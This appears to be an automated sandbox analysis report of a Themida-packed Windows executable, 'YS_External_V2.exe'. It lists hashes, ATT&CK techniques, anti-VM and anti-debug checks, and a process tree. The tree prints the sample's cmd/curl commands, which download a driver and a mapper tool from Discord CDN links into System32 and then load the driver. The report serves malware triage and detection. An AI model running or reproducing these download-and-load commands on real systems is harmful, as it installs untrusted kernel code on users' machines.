863ef4a6cc53d9ba762c43b053c60ff854ed5bb2a635d49ffa166569e8a8996c

General

Target

YS_External_V2.exe
Size

23.5MB
MD5

49bd07fcd35833d498db74a30e8da0c4
SHA1

695998aa01dcb54bbb8f3432d3eca4e39e84ee9b
SHA256

863ef4a6cc53d9ba762c43b053c60ff854ed5bb2a635d49ffa166569e8a8996c
SHA512

752ef105d0cc9196278f6fc9dbe40c6a940ae5543fc03962cfaa45c6e0e7183c6cfb7950d823131b01e6928214b408602bf888fcac531c7f8ed99ebeb07a21fa
SSDEEP

393216:nsL9KDKh8hHNQu6UDB5w0Lp/juLBqyBRhfvSOMQ0569yjRZ:nsLMDxy5cgqxjuwyBjAjo9k

Score

9^/10

evasion persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

YS_External_V2.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ YS_External_V2.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	YS_External_V2.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

yamsmapper.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv"	yamsmapper.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

YS_External_V2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	YS_External_V2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	YS_External_V2.exe

Executes dropped EXE 1 IoCs

Processes:

yamsmapper.exe

pid process

4340 yamsmapper.exe

pid	process
4340	yamsmapper.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida
behavioral2/memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida
behavioral2/memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida
behavioral2/memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida
behavioral2/memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida
behavioral2/memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

YS_External_V2.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YS_External_V2.exe
Drops file in System32 directory 2 IoCs

Processes:

curl.execurl.exe

description ioc process

File created C:\Windows\System32\yamsud.sys curl.exe
File created C:\Windows\System32\yamsmapper.exe curl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

YS_External_V2.exe

pid process

1292 YS_External_V2.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

yamsmapper.exe

pid process

4340 yamsmapper.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

yamsmapper.exe

description pid process

Token: SeLoadDriverPrivilege 4340 yamsmapper.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	YS_External_V2.exe

description	ioc	process
File created	C:\Windows\System32\yamsud.sys	curl.exe
File created	C:\Windows\System32\yamsmapper.exe	curl.exe

pid	process
1292	YS_External_V2.exe

pid	process
4340	yamsmapper.exe

description	pid	process
Token: SeLoadDriverPrivilege	4340	yamsmapper.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

YS_External_V2.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1292 wrote to memory of 1676	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 1676	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 4456	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 4456	1292	YS_External_V2.exe	cmd.exe
PID 4456 wrote to memory of 220	4456	cmd.exe	curl.exe
PID 4456 wrote to memory of 220	4456	cmd.exe	curl.exe
PID 1292 wrote to memory of 4408	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 4408	1292	YS_External_V2.exe	cmd.exe
PID 4408 wrote to memory of 4060	4408	cmd.exe	curl.exe
PID 4408 wrote to memory of 4060	4408	cmd.exe	curl.exe
PID 1292 wrote to memory of 2064	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 2064	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 1492	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 1492	1292	YS_External_V2.exe	cmd.exe
PID 1492 wrote to memory of 4340	1492	cmd.exe	yamsmapper.exe
PID 1492 wrote to memory of 4340	1492	cmd.exe	yamsmapper.exe
PID 1292 wrote to memory of 4320	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 4320	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 1652	1292	YS_External_V2.exe	cmd.exe
PID 1292 wrote to memory of 1652	1292	YS_External_V2.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe
"C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
3⤵
- Drops file in System32 directory
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
3⤵
- Drops file in System32 directory
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
2⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\System32\yamsmapper.exe
C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:4320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause >nul 2>&1
2⤵
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\yamsmapper.exe
Filesize
153KB

MD5
666d7f4bb7cf64772755b9a184486525

SHA1
a645d988ff67e72aac11cc9560dbf89a8320aef0

SHA256
a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

SHA512
3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

Download Submit
C:\Windows\System32\yamsmapper.exe
Filesize
153KB

MD5
666d7f4bb7cf64772755b9a184486525

SHA1
a645d988ff67e72aac11cc9560dbf89a8320aef0

SHA256
a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

SHA512
3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

Download Submit
C:\Windows\System32\yamsud.sys
Filesize
12KB

MD5
141ecbccc4bfbf03b8768232d5c6a273

SHA1
0e0c0340b8bccfd6aa352e80739c882e4bbe5404

SHA256
2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122

SHA512
aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7

Download Submit
memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download
memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download
memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download
memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download
memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download
memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp

Filesize
36.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads